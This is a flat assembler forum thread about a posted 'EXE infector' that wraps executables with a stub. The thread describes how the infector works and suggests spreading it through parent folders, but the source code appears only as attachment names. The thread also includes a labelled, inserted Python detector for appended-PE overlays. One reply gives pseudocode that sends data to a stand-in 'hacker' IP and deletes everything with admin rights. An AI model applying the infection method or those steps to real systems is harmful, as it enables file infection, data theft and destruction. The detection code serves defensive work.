flat assembler
Message board for the users of flat assembler.

Index > Tutorials and Examples > Rather easy EXE infector

typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 06:53
A very simple way of infecting EXEs. Not practical but quite useful. All it does is append the original code to a stub, which will execute itself first then the original code. IMO I prefer entry point hijacking and reconstructing the whole PE file. However, that method would not work on encrypted EXEs. This is where this method comes in.

There are different ways of executing the original code. In this example, I just duplicate the infected file and remove the stub and let the windows loader take care of the rest. The duped file is hidden in the same folder but can also be extracted to a different folder.

The stub then waits for duplicated file and deletes it after its process terminates.

A more effective way is to find EXEs in current directory, infect them then move up to parent folder and up to a specified depth.

No error checking just straight up execution and no optimizations. Does not check if file is already infected. It will impregnate the file even more if infector.exe is ran multiple times.


Attachments:
- stub.ASM (3.14 KB)
- victim_exe.ASM (416 Bytes)
- infector.ASM (3.25 KB)

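A defender-side check for the file layout described in the post above (an added example, not code from the thread or from the attached sources): it walks the PE section table, measures the overlay that begins where the last section's raw data ends, and reports whether that overlay itself starts with a PE header, which is what a stub with the original EXE appended looks like. The minimal PE builder is a constructed test fixture, not a real program.

```python
import struct

SECTION_HEADER_SIZE = 40


def pe_overlay_offset(data: bytes) -> int:
    """Offset where the overlay (bytes past the last section's raw data) begins, or -1 if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return -1
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return -1
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    end = table + num_sections * SECTION_HEADER_SIZE  # headers themselves count as content
    for i in range(num_sections):
        entry = table + i * SECTION_HEADER_SIZE
        if entry + SECTION_HEADER_SIZE > len(data):
            return -1  # truncated section table: not a loadable PE
        raw_size, raw_ptr = struct.unpack_from("<II", data, entry + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def scan_for_appended_pe(data: bytes) -> dict:
    """Triage result: does the file carry an overlay, and does that overlay itself parse as a PE?"""
    off = pe_overlay_offset(data)
    if off < 0:
        return {"is_pe": False, "overlay_size": 0, "embedded_pe": False}
    overlay = data[off:]
    return {"is_pe": True, "overlay_size": len(overlay),
            "embedded_pe": pe_overlay_offset(overlay) >= 0}


def build_fake_pe(body: bytes) -> bytes:
    """Constructed minimal PE (not runnable): DOS header, PE signature, COFF header with no
    optional header, and one section whose raw data is `body`, placed at file offset 0x80."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    section = struct.pack("<8sIIII16x", b".text", len(body), 0x1000, len(body), 0x80)
    return dos + coff + section + body


if __name__ == "__main__":
    clean = build_fake_pe(b"\xC3" * 16)
    wrapped = build_fake_pe(b"\x90" * 32) + clean  # stub with the original EXE appended
    print(scan_for_appended_pe(clean))    # no overlay
    print(scan_for_appended_pe(wrapped))  # overlay that is itself a PE
```

Overlays are also common in legitimate installers and self-extracting archives, so treat a hit as a triage signal for an analyst, not a verdict.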
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:02
typedef wrote:
Not practical but quite useful.
Useful for what? Can you give an example usage that does not involve malware?
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 07:05
revolution wrote:
typedef wrote:
Not practical but quite useful.
Useful for what? Can you give an example usage that does not involve malware?


Useful to malware analysis personnel. Now we can update our API pattern call hashes and flag these types of files.
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:06
typedef wrote:
revolution wrote:
typedef wrote:
Not practical but quite useful.
Useful for what? Can you give an example usage that does not involve malware?


Useful to malware analysis personnel. Now we can update our API pattern call hashes and flag these types of files.
That involves malware.
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 07:10
revolution wrote:
typedef wrote:
revolution wrote:
typedef wrote:
Not practical but quite useful.
Useful for what? Can you give an example usage that does not involve malware?


Useful to malware analysis personnel. Now we can update our API pattern call hashes and flag these types of files.
That involves malware.


rev
Without malware you think AV companies will make a dime?
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:11
Without malware we wouldn't need AV companies. Then we could have more cool things instead of broken computers.

So I guess you have no example that doesn't involve malware?
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 07:15
revolution wrote:
Without malware we wouldn't need AV companies. Then we could have more cool things instead of broken computers.

So I guess you have no example that doesn't involve malware?


Without broken computers there wouldn't be malware, and then there wouldn't be AV companies. And without Govt. backdoors and poor coding skills and hunger for money, there wouldn't be broken computers.
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:20
Creating malware is like burning down houses. All houses are susceptible to being burnt down but that doesn't mean we should be burning them down just to force us into making more robust houses. And just like malware, burning down houses creates no net positive for society, it just makes everyone waste time and effort to rebuild.
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 07:29
revolution wrote:
Creating malware is like burning down houses. All houses are susceptible to being burnt down but that doesn't mean we should be burning them down just to force us into making more robust houses. And just like malware, burning down houses creates no net positive for society, it just makes everyone waste time and effort to rebuild.


But the people who rebuild the houses love to do so because they are hungry for money, and sometimes they'll burn down some houses themselves just to be the ones to get hired to rebuild the houses.

Wonder why AVs cook up stories about malware that no one has even heard of and force you to buy/upgrade their software. Hell, they even make their software deliberately "incompatible" with other security software so their malware don't get flagged by their competitors.


Last edited by typedef on 25 Dec 2013, 07:45; edited 1 time in total
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:31
Indeed. I am no fan of AV companies either. It is not a perfect world we live in.
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1178
Location: Unknown
HaHaAnonymous 25 Dec 2013, 13:38
[ Post removed by author. ]


Last edited by HaHaAnonymous on 28 Feb 2015, 18:54; edited 1 time in total
baldr



Joined: 19 Mar 2008
Posts: 1651
baldr 25 Dec 2013, 14:07
HaHaAnonymous,

They have to sell product (as insecure as it is); it has nothing to do with your expectations (about its stability/satisfaction/whatever). It works (up to some measure), then it can be sold. Nothing personal, just business.

AV authors can (and probably would) intimidate regular users to use (and buy) their products, just as houseware manufacturers insist that their products will make our living safer. They both lie, in a way. It's about how long would you go to check it.
m3ntal



Joined: 08 Dec 2013
Posts: 296
m3ntal 25 Dec 2013, 18:29
typedef: I'm sure you have some positive examples. How about a binary tree? Or a minimal Android example?

If an agency contacted me to create malware software, I'd refuse their business and tell them that it goes against my philosophy that software should be productive and not destructive to the user. Knowledge of LL concepts, machine code, executable formats, etc, can be used in a positive way; example: dynamic binary translator to/from X86+ARM. Just my thoughts.
Frank



Joined: 17 Jun 2003
Posts: 100
Frank 29 Dec 2013, 14:38
Alright, after eleven off-topic responses, maybe someone should comment on the actual tutorial.

typedef, you have provided a generic EXE wrapper template. The code is written cleanly, it is easy to understand, and when I tried it briefly, it worked as expected (WIN7 Home Edition; no serious virus scanner installed). Insofar it is a very nice addition for the "Examples and Tutorials" section of this board. Congratulations!

What needs a bit more work in the future is how you describe your contributions. By needlessly (and incorrectly!) framing your "EXE wrapper" as an "EXE infector" you achieved several things that you probably don't want: (a) you made yourself look like an attention-whoring 14-year old, (b) you invited the useless weirdo discussion about malware that you now got, rather than receiving useful feedback from competent people, and (c) people interested in EXE wrapping for legit purposes will ignore your tutorial because its context shouts "filth, smut, danger" loudly enough to make them not even look at the code. No congratulations on that.

This feedback is genuinely meant to be useful to you. You're welcome.
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1178
Location: Unknown
HaHaAnonymous 29 Dec 2013, 17:01
[ Post removed by author. ]


Last edited by HaHaAnonymous on 28 Feb 2015, 18:41; edited 1 time in total
edfed



Joined: 20 Feb 2006
Posts: 4353
Location: Now
edfed 31 Dec 2013, 12:04
malware is just like regular software with curious policies...

a machine is dumb (mov eax,ebx lea eax,[eax*5] etc...), it does what you tell it to do.
malware just involves the same instructions as regular software, but they are arranged in order to break the system...

then, it is not the laziness of system developers or whatever, but just the will of malware writers to make malware.

you can virtually write malware for any programmable machine, from a heater regulator to a cray, but it is just malware.

the goal of software is not to reproduce the genetically altered things we see in hospitals, but to make cooler and cooler stuff.

maybe malware can bring some bricks to the future of computing, by highlighting some basic mechanisms of attacks and study some ways to avoid them... but there will always be malware writers, even for the more secure platform.

then, what the goal of security? take 30%, 60%, 99% of the machine just to protect it???

ridiculous.

the size of AV softwares is just a big insult to the freedom's and the efficiency's needs of this time.

i don't believe malware are cool at all.

first, it is a pure waste of time to create malware, the creativeness of malware writers is poorly exploited.
second, it is a pure waste of resources, the machines running malware will use energy and hardware to do that, and what it does is clearly useless.

anybody can tell you that bill gates became what he is now by writing goodware (not malware).
what he did was to make useful OS and suites, used by billions of people, and it is not cause it is microsoft, it is not also cause he was the son of somebody, but just cause he focused on creativity and usefulness of his products.

of course, m$ is $hit, but a cool $hit, and i don't believe that anybody here never used a m$ product at least one time in his life...

in fact, malware is just the product of jealous people that consider windows as the shit of the century...

in my opinion, the real shit is more a military product like kalashnikov, or a chemical like DDT, or something really dangerous...

and that's the reason why bill gates became what he is now. he didn't create malware and weapons, but just software used by the weapons designers.

hem...

bill gates is not a model to follow, but he is not the problem to fight.
and writing malware is always possible, even a fortress can be attacked. then, what do we need?

computers or fortress?

i need computer to do cool things, not fortress to hide behind with fear.


and windows 98 is really cool cause now, it can no longer browse the internet cause the new script norms are not supported
then, win98 is just a pure machine, able to do stuff like they did before internet generalisation.

for example, win98 supports the sockets very well, and that is very cool to try network designs

and fuck malware.

for example, this kind of pseudocode:
Code:
invoke sendEverythingInbackGround,"theipofthehacker"
invoke deleteEverythingInBackgroundWithAdminPrivilege
DOS386



Joined: 08 Dec 2006
Posts: 1905
DOS386 01 Jan 2014, 09:03
revolution wrote:
Creating malware is like burning down houses


NO. Creating malware is like creating matches. But nowadays nobody needs malware (we got it already from M$), like nobody needs matches (we no longer heat using fire).

So creating malware is useless but legal. Using malware to destroy other people's PCs is a crime. And creating matches is useless but legal. Using matches to burn down other people's houses is a crime.

Further, nobody would have malware problems or need "AV" (= malware) if hardware and OS'es were designed properly.
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1178
Location: Unknown
HaHaAnonymous 01 Jan 2014, 14:12
[ Post removed by author. ]


Last edited by HaHaAnonymous on 28 Feb 2015, 18:40; edited 1 time in total
tthsqe



Joined: 20 May 2009
Posts: 767
tthsqe 02 Jan 2014, 19:26
HaHaAnonymous, if what you are saying is true, are not AV companies themselves viruses on the computer market? I always thought of AV programs as viruses ever since I reached the age of reason...
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1178
Location: Unknown
HaHaAnonymous 02 Jan 2014, 23:44
[ Post removed by author. ]


Last edited by HaHaAnonymous on 28 Feb 2015, 18:40; edited 1 time in total
Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.